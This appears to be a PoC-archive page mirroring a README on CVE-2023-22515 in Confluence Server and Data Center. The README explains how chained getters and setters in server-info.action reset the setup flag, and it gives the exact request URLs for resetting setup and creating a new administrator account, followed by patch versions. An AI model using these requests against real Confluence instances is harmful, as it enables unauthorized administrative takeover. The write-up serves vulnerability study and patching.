关联漏洞
标题:
Atlassian Confluence Server 安全漏洞
(CVE-2023-22515)
描述:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server存在安全漏洞,该漏洞源于外部攻击者可能利用可公开访问的Confluence Data Center和Confluence Serve,用未知的漏洞来创建Confluence 管理员帐户并访问 Confluence 实例。
描述
Server Broken Access Control in Confluence - CVE-2023-22515
介绍
# Confluence Vulnerability - CVE-2023-22515 :notebook:
### Introduction
Atlassian was informed about a possible vulnerability that could be exploited and compromising the environment through administrative access. On October 4, 2023, Atlassian released a security advisory regarding CVE-2023-22515 which got a CVE of 10.0. The vulnerability was introduced in version 8.0.0 of **Confluence Server** and **Data Center editions** and is present in versions **<8.3.3, <8.4.3, <8.5.2**.
An attacker can exploit the vulnerability to create an additional account in Confluence with full administrative privileges. The attacker needs no prior information to exploit the vulnerability. The vulnerability is believed to enable other unknown attack vectors and should be patched as soon as possible.
<p align="center">
<img width="800" height="200" src="./img/1.jpg">
</p>
## Explaining the Exploration :warning:
With this vulnerability, the attacker can return to the setup stage of confluence configuration, managing to create a new user with administrative access. This is all possible because Confluence is built using the Apache Struts framework, which depends on the XWork package. XWork allows you to define Actions in the form of a Java class. Each Action can be invoked through a URL, and the corresponding Java class will handle the request, do whatever the Action requires, and emit a response.
This problem happens mainly due to a class action, where we can invoke attributes via URL
- **Chaining Getters/Setters to Reenable the Initial Setup**
The exploration takes place in the ```ServerInfoAction``` action, where we can manipulate the class's getters/setters and reset the setup configuration.
If you analyse the code of the ```ServerInfoAction``` class, you'll see it extends the ```ConfluenceActionSupport``` class. By doing so, it will inherit all of its methods as well. One such method is a getter that returns a BootstrapStatusProvider object:
```
public class ConfluenceActionSupport extends ActionSupport implements LocaleProvider, WebInterface, MessageHolderAware {
public BootstrapStatusProvider getBootstrapStatusProvider() {
if (this.bootstrapStatusProvider == null)
this.bootstrapStatusProvider = BootstrapStatusProviderImpl.getInstance();
return this.bootstrapStatusProvider;
}
}
```
We care about the BootstrapStatusProvider class because it has another getter method we can use to retrieve an ApplicationConfiguration object:
```
public class BootstrapStatusProviderImpl implements BootstrapStatusProvider, BootstrapManagerInternal {
public ApplicationConfiguration getApplicationConfig() {
return this.delegate.getApplicationConfig();
}
}
```
This object contains the application's configuration, including an attribute that tells Confluence if the initial setup has been finished. Such attribute can be modified by using a setter in the ApplicationConfig class:
```
public class ApplicationConfig implements ApplicationConfiguration {
public synchronized void setSetupComplete(boolean setupComplete) {
this.setupComplete = setupComplete;
}
}
```
If we can call setSetupComplete(false), we can reset the setup configuration process, and we can do this using the getters/setters methods as below;
```
http://10.10.227.86:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
```
This url will call all the methods we mentioned above, arriving at the target method responsible for resetting the setup.
```
getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false)
```
## Hand On :writing_hand:
Below, we have an example of a server with a vulnerable version of confluence.
<p align="center">
<img width="1000" height="400" src="./img/2.jpg">
</p>
let's try to restart the setup process using the method call as explained above;
```
http://atlassian.poc:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
```
After setting the setupcomplete parameter to false, we will receive the return success. This means that the attempt to change the parameter was successful.
<p align="center">
<img width="900" height="180" src="./img/3.jpg">
</p>
- **Creating new administrative account** :fire:
let's try to create a new account by accessing the setup url, which we try to reset the process.
```
http://atlassian.poc:8090/setup/setupadministrator-start.action
```
<p align="center">
<img width="900" height="400" src="./img/4.jpg">
</p>
- Done !!! :heavy_check_mark:
We were able to reset the setup process and create a new user with administrative access.
<p align="center">
<img width="900" height="500" src="./img/5.jpg">
</p>
## Patching :white_check_mark:
The vulnerability has been fixed in versions **8.3.3, 8.4.3 and 8.5.2**. Any newer version branches should be safe as well.
For more details, Atlassian has released details of this vulnerability on its website ([About more - Atlassian](https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html)).
文件快照
[4.0K] /data/pocs/c2001391637dda894d2ba8003f08c2ea53c424b7
├── [4.0K] img
│ ├── [161K] 1.jpg
│ ├── [ 30K] 2.jpg
│ ├── [ 21K] 3.jpg
│ ├── [ 53K] 4.jpg
│ └── [ 75K] 5.jpg
└── [5.0K] README.md
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。